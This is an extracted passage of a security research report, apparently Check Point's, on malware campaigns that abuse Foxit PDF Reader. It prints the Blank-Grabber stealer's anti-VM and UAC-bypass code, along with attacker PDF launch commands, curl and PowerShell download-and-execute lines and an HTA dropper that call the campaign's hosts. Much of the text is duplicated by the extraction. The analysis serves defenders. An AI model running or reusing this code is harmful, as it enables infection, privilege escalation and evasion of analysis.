Blank-Grabber appears to be a fully functional open-source infostealer, and its low detection rate makes it an even bigger threat for targeted users.
Case IV. From PDF to PDF to … Remcos
Another interesting case occurred when a malicious PDF included a hyperlink to an attachment hosted on trello.com. Upon downloading, it revealed a secondary PDF file containing malicious code, which takes advantage of this "exploitation" of Foxit Reader users. The attack chain is once again impressive, with multiple files being dropped in order to infect the victim with the final payload. In total, more than 10 files were executed, with the final malware, Remcos RAT, being injected into memory using DynamicWrapperX.
Figure 15 – Attack Chain leading to Remcos RAT
The Threat Actor performing this campaign, @Silentkillertv, also appears to be selling malicious tools via Telegram.
The Python malware is then downloaded as  lol.pyw  and executed on the victim’s machine.\r\n/P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\r\nNet.WebClient).DownloadFile(\\'hxxps://cdn.discordapp.com/attachments/1167576449859993683/1168168071366709278/lol.pyw\\',\r\n\\'lol.pyw\\')\"'\r\nmsd89h2j389uh.bat \u0026@echo timeout\r\nmsd89h2j389uh.bat \u0026@echo start stub.pyw\r\n/OpenAction \u003c\u003c /S /Launch /Win \u003c\u003c /F (CMD) /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\r\nNet.WebClient).DownloadFile(\\'hxxps://cdn.discordapp.com/attachments/1167576449859993683/1168168071366709278/lol.pyw\\',\r\n\\'lol.pyw\\')\"' \u003e\u003e msd89h2j389uh.bat \u0026@echo timeout / t 5 \u003e\u003e msd89h2j389uh.bat \u0026@echo start stub.pyw \u003e\u003e\r\n /OpenAction\r\n \u003c\u003c\r\n /S /Launch\r\n /Win\r\n \u003c\u003c\r\n /F (CMD)\r\n /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile(\\'hxxps://c\r\n \u003e\u003e\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 12 of 32\n\nmsd89h2j389uh.bat \u0026@echo timeout\r\n / t 5\r\n \u003e\u003e\r\n msd89h2j389uh.bat \u0026@echo start stub.pyw\r\n \u003e\u003e\r\nCode 13 – PDF executed command.\r\nThe malware is functional and possesses many features, from a Graphical Builder to UAC Bypass, Anti VM, and stealing\r\ncapabilities from various browsers and applications.\r\nFigure 14 - Features as listed on the GitHub\r\nproject.\r\nFigure 14 – Features as listed on the GitHub project.\r\nWhat is interesting to see is the  class VmProtect , which lists all the anti-VM techniques.\r\nFrom identifying known:\r\n1. UUIDs,\r\n2. Computer names\r\n3. Users names\r\n4. Registry key \u0026 values\r\n5. killing running tasks related to Virtual machines or any other malware-reversing related tools.\r\n6. 
Making Internet-related checks regarding the emulation of the network and checking if the system is hosted online.\r\nBLACKLISTED_UUIDS = ('7AB5C494-39F5-4941-9163-47F54D6D5016', '032E02B4-0499-05C3-0806-3C0700080009',\r\n'03DE0294-0480-05DE-1A06-350700080009', '11111111-2222-3333-4444-555555555555', '6F3CA5EC-BEC9-4A4D-8274-11168F640058', 'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548', '4C4C4544-0050-3710-8058-CAC04F59344A',\r\n'00000000-0000-0000-0000-AC1F6BD04972', '00000000-0000-0000-0000-000000000000', '5BD24D56-789F-8468-7CDC-CAA7222CC121', '49434D53-0200-9065-2500-65902500E439', '49434D53-0200-9036-2500-36902500F022', '777D84B3-\r\n88D1-451C-93E4-D235177420A7', '49434D53-0200-9036-2500-369025000C65', 'B1112042-52E8-E25B-3655-\r\n6A4F54155DBF', '00000000-0000-0000-0000-AC1F6BD048FE', 'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\r\n'A15A930C-8251-9645-AF63-E45AD728C20C', '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3', 'C7D23342-A5D4-\r\n68A1-59AC-CF40F735B363', '63203342-0EB0-AA1A-4DF5-3FB37DBB0670', '44B94D56-65AB-DC02-86A0-\r\n98143A7423BF', '6608003F-ECE4-494E-B07E-1C4615D1D93C', 'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\r\n'49434D53-0200-9036-2500-369025003AF0', '8B4E8278-525C-7343-B825-280AEBCD3BCB', '4D4DDC94-E06C-44F4-\r\n95FE-33A1ADA5AC27', '79AF5279-16CF-4094-9758-F88A616D81B4', 'FE822042-A70C-D08B-F1D1-C207055A488F',\r\n'76122042-C286-FA81-F0A8-514CC507B250', '481E2042-A1AF-D390-CE06-A8F783B1E76A', 'F3988356-32F5-4AE1-\r\n8D47-FD3B8BAFBD4C', '9961A120-E691-4FFE-B67B-F0E4115D5919')\r\nBLACKLISTED_COMPUTERNAMES = ('bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr', 'b30f0242-1c6a-4',\r\n'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb', 'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc', 'desktop-b0t93d6',\r\n'desktop-1pykp29', 'desktop-1y2433r', 'wileypc', 'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs', 'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc', 'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076', 'desktop-vkeons4', 
'NTT-EFF-2W11WSS')\r\nBLACKLISTED_USERS = ('wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex', 'john-pc', 'rdhj0cnfevzx',\r\n'keecfmwgj', 'frank', '8nl0colnq5bq', 'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a', 'lmvwjj9b',\r\n'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl', 'harry johnson', 'j.seance', 'a.monaldo', 'tvm')\r\nBLACKLISTED_TASKS = ('fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler', 'vboxservice', 'df5serv', 'vboxtray',\r\n'vmtoolsd', 'vmwaretray', 'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice', 'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg',\r\n'vmusrvc', 'prl_cc', 'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol', 'ksdumperclient', 'ksdumper', 'joeboxserver',\r\n'vmwareservice', 'vmwaretray', 'discordtokenprotector')\r\nLogger.info('Checking UUID')\r\nuuid = subprocess.run('wmic csproduct get uuid', shell=True, capture_output=True).stdout.splitlines()\r\n[2].decode(errors='ignore').strip()\r\nreturn uuid in VmProtect.BLACKLISTED_UUIDS\r\ndef checkComputerName() -\u003e bool:\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 13 of 32\n\nLogger.info('Checking computer name')\r\ncomputername = os.getenv('computername')\r\nreturn computername.lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\r\ndef checkUsers() -\u003e bool:\r\nLogger.info('Checking username')\r\nreturn user.lower() in VmProtect.BLACKLISTED_USERS\r\ndef checkHosting() -\u003e bool:\r\nLogger.info('Checking if system is hosted online')\r\nhttp = PoolManager(cert_reqs='CERT_NONE')\r\nreturn http.request('GET', 'http://ip-api.com/line/?fields=hosting').data.decode(errors='ignore').strip() == 'true'\r\nLogger.info('Unable to check if system is hosted online')\r\ndef checkHTTPSimulation() -\u003e bool:\r\nLogger.info('Checking if system is simulating connection')\r\nhttp = PoolManager(cert_reqs='CERT_NONE', timeout=1.0)\r\nhttp.request('GET', f'https://blank-{Utility.GetRandomString()}.in')\r\ndef 
checkRegistry() -\u003e bool:\r\nLogger.info('Checking registry')\r\nr1 = subprocess.run('REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-\r\nE325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2', capture_output=True, shell=True)\r\nr2 = subprocess.run('REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-\r\nE325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2', capture_output=True, shell=True)\r\ngpucheck = any((x.lower() in subprocess.run('wmic path win32_VideoController get name', capture_output=True,\r\nshell=True).stdout.decode(errors='ignore').splitlines()[2].strip().lower() for x in ('virtualbox', 'vmware')))\r\ndircheck = any([os.path.isdir(path) for path in ('D:\\\\Tools', 'D:\\\\OS2', 'D:\\\\NT3X')])\r\nreturn r1.returncode != 1 and r2.returncode != 1 or gpucheck or dircheck\r\nUtility.TaskKill(*VmProtect.BLACKLISTED_TASKS)\r\nLogger.info('Checking if system is a VM')\r\nThread(target=VmProtect.killTasks, daemon=True).start()\r\nresult = VmProtect.checkHTTPSimulation() or VmProtect.checkUUID() or VmProtect.checkComputerName() or\r\nVmProtect.checkUsers() or VmProtect.checkHosting() or VmProtect.checkRegistry()\r\nLogger.info('System is a VM')\r\nLogger.info('System is not a VM')\r\nclass VmProtect: BLACKLISTED_UUIDS = ('7AB5C494-39F5-4941-9163-47F54D6D5016', '032E02B4-0499-05C3-\r\n0806-3C0700080009', '03DE0294-0480-05DE-1A06-350700080009', '11111111-2222-3333-4444-555555555555',\r\n'6F3CA5EC-BEC9-4A4D-8274-11168F640058', 'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548', '4C4C4544-0050-\r\n3710-8058-CAC04F59344A', '00000000-0000-0000-0000-AC1F6BD04972', '00000000-0000-0000-0000-000000000000',\r\n'5BD24D56-789F-8468-7CDC-CAA7222CC121', '49434D53-0200-9065-2500-65902500E439', '49434D53-0200-9036-\r\n2500-36902500F022', '777D84B3-88D1-451C-93E4-D235177420A7', '49434D53-0200-9036-2500-369025000C65',\r\n'B1112042-52E8-E25B-3655-6A4F54155DBF', '00000000-0000-0000-0000-AC1F6BD048FE', 
'EB16924B-FB6D-4FA1-\r\n8666-17B91F62FB37', 'A15A930C-8251-9645-AF63-E45AD728C20C', '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\r\n'C7D23342-A5D4-68A1-59AC-CF40F735B363', '63203342-0EB0-AA1A-4DF5-3FB37DBB0670', '44B94D56-65AB-DC02-86A0-98143A7423BF', '6608003F-ECE4-494E-B07E-1C4615D1D93C', 'D9142042-8F51-5EFF-D5F8-\r\nEE9AE3D1602A', '49434D53-0200-9036-2500-369025003AF0', '8B4E8278-525C-7343-B825-280AEBCD3BCB',\r\n'4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27', '79AF5279-16CF-4094-9758-F88A616D81B4', 'FE822042-A70C-D08B-F1D1-C207055A488F', '76122042-C286-FA81-F0A8-514CC507B250', '481E2042-A1AF-D390-CE06-\r\nA8F783B1E76A', 'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C', '9961A120-E691-4FFE-B67B-F0E4115D5919')\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 14 of 32\n\nBLACKLISTED_COMPUTERNAMES = ('bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr', 'b30f0242-1c6a-4',\r\n'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb', 'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc', 'desktop-b0t93d6',\r\n'desktop-1pykp29', 'desktop-1y2433r', 'wileypc', 'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs', 'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc', 'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076', 'desktop-vkeons4', 'NTT-EFF-2W11WSS') BLACKLISTED_USERS = ('wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\r\n'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq', 'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm',\r\n'w0fjuovmccp5a', 'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl', 'harry johnson', 'j.seance', 'a.monaldo', 'tvm')\r\nBLACKLISTED_TASKS = ('fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler', 'vboxservice', 'df5serv', 'vboxtray',\r\n'vmtoolsd', 'vmwaretray', 'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice', 'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg',\r\n'vmusrvc', 'prl_cc', 'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol', 'ksdumperclient', 
'ksdumper', 'joeboxserver',\r\n'vmwareservice', 'vmwaretray', 'discordtokenprotector') @staticmethod def checkUUID() -\u003e bool: Logger.info('Checking\r\nUUID') uuid = subprocess.run('wmic csproduct get uuid', shell=True, capture_output=True).stdout.splitlines()\r\n[2].decode(errors='ignore').strip() return uuid in VmProtect.BLACKLISTED_UUIDS @staticmethod def\r\ncheckComputerName() -\u003e bool: Logger.info('Checking computer name') computername = os.getenv('computername') return\r\ncomputername.lower() in VmProtect.BLACKLISTED_COMPUTERNAMES @staticmethod def checkUsers() -\u003e bool:\r\nLogger.info('Checking username') user = os.getlogin() return user.lower() in VmProtect.BLACKLISTED_USERS\r\n@staticmethod def checkHosting() -\u003e bool: Logger.info('Checking if system is hosted online') http =\r\nPoolManager(cert_reqs='CERT_NONE') try: return http.request('GET', 'http://ip-api.com/line/?\r\nfields=hosting').data.decode(errors='ignore').strip() == 'true' except Exception: Logger.info('Unable to check if system is\r\nhosted online') return False @staticmethod def checkHTTPSimulation() -\u003e bool: Logger.info('Checking if system is\r\nsimulating connection') http = PoolManager(cert_reqs='CERT_NONE', timeout=1.0) try: http.request('GET', f'https://blank-\r\n{Utility.GetRandomString()}.in') except Exception: return False else: return True @staticmethod def checkRegistry() -\u003e\r\nbool: Logger.info('Checking registry') r1 = subprocess.run('REG QUERY\r\nHKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-\r\n08002BE10318}\\\\0000\\\\DriverDesc 2', capture_output=True, shell=True) r2 = subprocess.run('REG QUERY\r\nHKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-\r\n08002BE10318}\\\\0000\\\\ProviderName 2', capture_output=True, shell=True) gpucheck = any((x.lower() in\r\nsubprocess.run('wmic path win32_VideoController get name', 
capture_output=True,\r\nshell=True).stdout.decode(errors='ignore').splitlines()[2].strip().lower() for x in ('virtualbox', 'vmware'))) dircheck =\r\nany([os.path.isdir(path) for path in ('D:\\\\Tools', 'D:\\\\OS2', 'D:\\\\NT3X')]) return r1.returncode != 1 and r2.returncode != 1 or\r\ngpucheck or dircheck @staticmethod def killTasks() -\u003e None: Utility.TaskKill(*VmProtect.BLACKLISTED_TASKS)\r\n@staticmethod def isVM() -\u003e bool: Logger.info('Checking if system is a VM') Thread(target=VmProtect.killTasks,\r\ndaemon=True).start() result = VmProtect.checkHTTPSimulation() or VmProtect.checkUUID() or\r\nVmProtect.checkComputerName() or VmProtect.checkUsers() or VmProtect.checkHosting() or VmProtect.checkRegistry()\r\nif result: Logger.info('System is a VM') else: Logger.info('System is not a VM') return result\r\nclass VmProtect:\r\n BLACKLISTED_UUIDS = ('7AB5C494-39F5-4941-9163-47F54D6D5016', '032E02B4-0499-05C3-0806-3C0700080009', '03DE\r\n BLACKLISTED_COMPUTERNAMES = ('bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr', 'b30f0242-1c6a-4',\r\n BLACKLISTED_USERS = ('wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex', 'john-pc', 'rdhj0cnfe\r\n BLACKLISTED_TASKS = ('fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler', 'vboxservice', 'df5se\r\n @staticmethod\r\n def checkUUID() -\u003e bool:\r\n Logger.info('Checking UUID')\r\n uuid = subprocess.run('wmic csproduct get uuid', shell=True, capture_output=True).stdout.splitlines()\r\n return uuid in VmProtect.BLACKLISTED_UUIDS\r\n @staticmethod\r\n def checkComputerName() -\u003e bool:\r\n Logger.info('Checking computer name')\r\n computername = os.getenv('computername')\r\n return computername.lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\r\n @staticmethod\r\n def checkUsers() -\u003e bool:\r\n Logger.info('Checking username')\r\n user = os.getlogin()\r\n return user.lower() in VmProtect.BLACKLISTED_USERS\r\n @staticmethod\r\n def checkHosting() -\u003e bool:\r\n Logger.info('Checking if 
system is hosted online')\r\n http = PoolManager(cert_reqs='CERT_NONE')\r\n try:\r\n return http.request('GET', 'http://ip-api.com/line/?fields=hosting').data.decode(errors='ignore')\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 15 of 32\n\nexcept Exception:\r\n Logger.info('Unable to check if system is hosted online')\r\n return False\r\n @staticmethod\r\n def checkHTTPSimulation() -\u003e bool:\r\n Logger.info('Checking if system is simulating connection')\r\n http = PoolManager(cert_reqs='CERT_NONE', timeout=1.0)\r\n try:\r\n http.request('GET', f'https://blank-{Utility.GetRandomString()}.in')\r\n except Exception:\r\n return False\r\n else:\r\n return True\r\n @staticmethod\r\n def checkRegistry() -\u003e bool:\r\n Logger.info('Checking registry')\r\n r1 = subprocess.run('REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E3\r\n r2 = subprocess.run('REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E3\r\n gpucheck = any((x.lower() in subprocess.run('wmic path win32_VideoController get name', capture_output\r\n dircheck = any([os.path.isdir(path) for path in ('D:\\\\Tools', 'D:\\\\OS2', 'D:\\\\NT3X')])\r\n return r1.returncode != 1 and r2.returncode != 1 or gpucheck or dircheck\r\n @staticmethod\r\n def killTasks() -\u003e None:\r\n Utility.TaskKill(*VmProtect.BLACKLISTED_TASKS)\r\n @staticmethod\r\n def isVM() -\u003e bool:\r\n Logger.info('Checking if system is a VM')\r\n Thread(target=VmProtect.killTasks, daemon=True).start()\r\n result = VmProtect.checkHTTPSimulation() or VmProtect.checkUUID() or VmProtect.checkComputerName() or\r\n if result:\r\n Logger.info('System is a VM')\r\n else:\r\n Logger.info('System is not a VM')\r\n return result\r\nCode 14 – VM protect class.\r\nAnother interesting part is the function, which results in UAC bypass,  def UACbypass .\r\ndef UACbypass(method: int=1) -\u003e bool:\r\nexecute = lambda cmd: 
subprocess.run(cmd, shell=True, capture_output=True)\r\nexecute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.executable}\" /f')\r\nexecute('reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateExecute\" /f')\r\nlog_count_before = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout)\r\nexecute('computerdefaults --nouacbypass')\r\nlog_count_after = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout)\r\nexecute('reg delete hkcu\\\\Software\\\\Classes\\\\ms-settings /f')\r\nif log_count_after \u003e log_count_before:\r\nreturn Utility.UACbypass(method + 1)\r\nexecute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.executable}\" /f')\r\nexecute('reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateExecute\" /f')\r\nlog_count_before = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout)\r\nexecute('fodhelper --nouacbypass')\r\nlog_count_after = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout)\r\nexecute('reg delete hkcu\\\\Software\\\\Classes\\\\ms-settings /f')\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 16 of 32\n\nif log_count_after \u003e log_count_before:\r\nreturn Utility.UACbypass(method + 1)\r\n@staticmethod def UACbypass(method: int=1) -\u003e bool: if Utility.GetSelf()[1]: execute = lambda cmd: subprocess.run(cmd,\r\nshell=True, capture_output=True) match method: case 1: execute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.executable}\" /f') execute('reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateExecute\" /f') log_count_before = len(execute('wevtutil qe \"Microsoft-Windows-Windows 
Defender/Operational\" /f:text').stdout) execute('computerdefaults --nouacbypass') log_count_after =\r\nlen(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout) execute('reg delete\r\nhkcu\\\\Software\\\\Classes\\\\ms-settings /f') if log_count_after \u003e log_count_before: return Utility.UACbypass(method + 1) case\r\n2: execute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.executable}\" /f') execute('reg add\r\nhkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateExecute\" /f') log_count_before =\r\nlen(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout) execute('fodhelper --\r\nnouacbypass') log_count_after = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\"\r\n/f:text').stdout) execute('reg delete hkcu\\\\Software\\\\Classes\\\\ms-settings /f') if log_count_after \u003e log_count_before: return\r\nUtility.UACbypass(method + 1) case _: return False return True\r\n @staticmethod\r\n def UACbypass(method: int=1) -\u003e bool:\r\n if Utility.GetSelf()[1]:\r\n execute = lambda cmd: subprocess.run(cmd, shell=True, capture_output=True)\r\n match method:\r\n case 1:\r\n execute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.exec\r\n execute('reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateEx\r\n log_count_before = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operationa\r\n execute('computerdefaults --nouacbypass')\r\n log_count_after = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\r\n execute('reg delete hkcu\\\\Software\\\\Classes\\\\ms-settings /f')\r\n if log_count_after \u003e log_count_before:\r\n return Utility.UACbypass(method + 1)\r\n case 2:\r\n execute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.exec\r\n 
execute('reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateEx\r\n log_count_before = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operationa\r\n execute('fodhelper --nouacbypass')\r\n log_count_after = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\r\n execute('reg delete hkcu\\\\Software\\\\Classes\\\\ms-settings /f')\r\n if log_count_after \u003e log_count_before:\r\n return Utility.UACbypass(method + 1)\r\n case _:\r\n return False\r\n return True\r\nCode 15 – UAC bypass function.\r\nBlank-Grabber appears to be a fully functional open-source infostealer, and its low detection rate makes it an even bigger\r\nthreat for targeted users.\r\nCase IV. From PDF to PDF to … Remcos\r\nAnother interesting case occurred when a malicious PDF included a hyperlink to an attachment hosted on  trello.com .\r\nUpon downloading, it revealed a secondary PDF file containing malicious code, which takes advantage of this\r\n“exploitation” of Foxit Reader users. The attack chain is once again impressive, with multiple files being dropped in order to\r\ninfect the victim with the final payload. In total, more than 10 files were executed, with the final malware Remcos RAT\r\nbeing injected into memory using the DynnamicWrapperX.\r\nFigure 15 - Attack Chain leading to Remcos RAT\r\nFigure 15 – Attack Chain leading to Remcos RAT\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 17 of 32\n\nThe Threat Actor performing this campaign,  @Silentkillertv , appears to be selling also malicious tools via Telegram. 
On the 27th of April, the Threat Actor published a PDF Exploit, which targets Foxit PDF Reader and is advertised with "100% Bypass of Anti-Viruses" as well as the ability to bypass "Gmail, Yahoo, Facebook, and Hotmail file sharing restrictions".
Figure 16 – Telegram Channel.
Campaign Technical Analysis
The first PDF file contained a malicious hyperlink that downloaded a PDF file named "Facebook_Adversting_project.pdf".
Figure 17 – First PDF file.
obj 119 0
 Type:
 Referencing:
 <<
  /S /URI
  /URI (hxxps://trello.com/1/cards/661a23427b01e8ba1bde8e2e/attachments/662d51f9e28ce98ab46ecd93/download/Facebook_Adversting_project.pdf)
 >>
Code 16 – First PDF link.
Once the link is clicked, the victim receives the second PDF file, which is hosted on trello.com, a legitimate website. Similar to Discord, Threat Actors have been taking advantage of legitimate websites in order to host and distribute malicious files.
Figure 18 – The second PDF hosted on trello.com.
The file was uploaded on the 27th of April by "Bechtelar Libby @bechtelarlibby".
Figure 19 – PDF attached on 27th of April 2024
The user's initial activity seems to date back to March 1st, 2024.
Judging by the file and folder names generated by the suspicious account, it appears that the targeted countries included Vietnam and Korea, among others.
 Bảng Trello của tôi (Vietnamese): My Trello board
 Lập kế hoạch dự án (Vietnamese): Project planning
 Họp khởi động (Vietnamese): Kickoff meeting
 Cần làm (Vietnamese): Need to do
 Xong (Vietnamese): Done
 거래 데이터 (Korean): Transaction data
 신원 확인 (Korean): Identity verification
Figure 20 – Activity traced back to the 1st of March.
In the second PDF, the exploitation targeting Foxit users is executed through the following PowerShell command:
/OpenAction
 <<
  /S /Launch
  /Win
   <<
    /F (cmd.exe)
    /P '(/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile(\'hxxps://www.digitalmarketingstart.com/GFFFDSGSDGDFSGDFSGDSG.lnk\', \'NCGHDFHGTDFJMDFGKJHFTYFUKFYU.LNK\')"' >> VGHJFUYTKFJFGJHFGKJHGFTGHDFKTGJH.BAT &@echo timeout / t 5 >> VGHJFUYTKFJFGJHFGKJHGFTGHDFKTGJH.BAT &@echo start NCGHDFHGTDFJMDFGKJHFTYFUKFYU.LNK >>
Code 17 – Second PDF Foxit Exploitation.
At this point, multiple "links"/files need to be followed in order to retrieve the final payload. The first payload is downloaded as NCGHDFHGTDFJMDFGKJHFTYFUKFYU.LNK and is a .lnk. This file uses curl to download a .hta file from a remote server and executes it from %AppData%\STARTGOVFFGHJFKJHFTFDGHJF.HTA.
/c mode 15,1 & .curl hxxps://digitalmarketingstart.com/PHOTO/photoSTARTGOUPDATEPHOTOVIWERGOSTART.JPG -o %AppData%\STARTGOVFFGHJFKJHFTFDGHJF.HTA & start /b %AppData%\STARTGOVFFGHJFKJHFTFDGHJF.HTA
Code 18 – 1st Payload, .lnk file command.
The HTA file initiates two requests to the same server, fetching two files. One is a VBScript file, while the other is a genuine image used as a decoy.
Notably, this HTA file contained comments written in Arabic (English translations are given in parentheses).
<html>
<head>
<script language="VBScript">
    Set objShell = CreateObject("WScript.Shell")
    ' تحديد روابط التحميل للملفات (define the download links for the files)
    Dim urlVBS, urlJPG
    urlVBS = "hxxps://digitalmarketingstart.com/PHOTO/PHOTOphoto_2024-04-27_07-31-10.jpg" ' رابط الملف الأول (FILE.VBS) (link of the first file)
    urlJPG = "hxxps://digitalmarketingstart.com/photo_2024-04-27_07-31-10.jpg" ' رابط الملف الثاني (FILE.JPG) (link of the second file)
    ' تنفيذ أمر التحميل باستخدام curl لكل ملف على حدة (run the download command with curl for each file separately)
    commandVBS = "cmd.exe /c mode 15,1 & curl " & urlVBS & " -o %temp%\FGHJFTFDHBJVJHGVHJKFVJGTFKHFJH.VBS & start /b %temp%\FGHJFTFDHBJVJHGVHJKFVJGTFKHFJH.VBS"
    commandJPG = "cmd.exe /c mode 15,1 & curl " & urlJPG & " -o %temp%\photo_2024-04-27_07-31-10.jpg & start /b %temp%\photo_2024-04-27_07-31-10.jpg"
    ' تنفيذ أوامر التحميل لكل ملف بشكل متوازٍ (run the download commands for each file in parallel)
    objShell.Run commandVBS, 0, True
    objShell.Run commandJPG, 0, True
    ' حذف ملف HTA الحالي بعد التحميل (delete the current HTA file after downloading)
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    strScriptPath = objFSO.GetAbsolutePathName(Replace(document.location.pathname, "/", "\"))
    objFSO.DeleteFile strScriptPath
    ' إغلاق نافذة التطبيق HTA (close the HTA application window)
    window.close
</script>
</head>
<body>
</body>
</html>
Code 19 – 2nd Payload, .hta file content.
The third payload is stored as %temp%\FGHJFTFDHBJVJHGVHJKFVJGTFKHFJH.VBS and is executed before the genuine image. This VBScript is straightforward, downloading additional VBScript code and executing the "response" accordingly.
Execute("set H___________________K=CreateObject(""MSXML2.XMLHTTP""):H___________________K.Open ""POST"",""hxxps://www.digitalmarketingstart.com/digitalmarketing/STARTPOWER2642024GO___________________________AUTO.MP4"",false:H
Code 20 – 3rd Payload, VBScript file content.
The VBScript code executes the following command:
mshta hxxps://www.digitalmarketingstart.com/digitalmarketing/ENCLUCKSAQSTART.TXT
Code 21 – 4th Payload, VBScript code.
The fifth payload is yet another .hta file that communicates with the same endpoint.
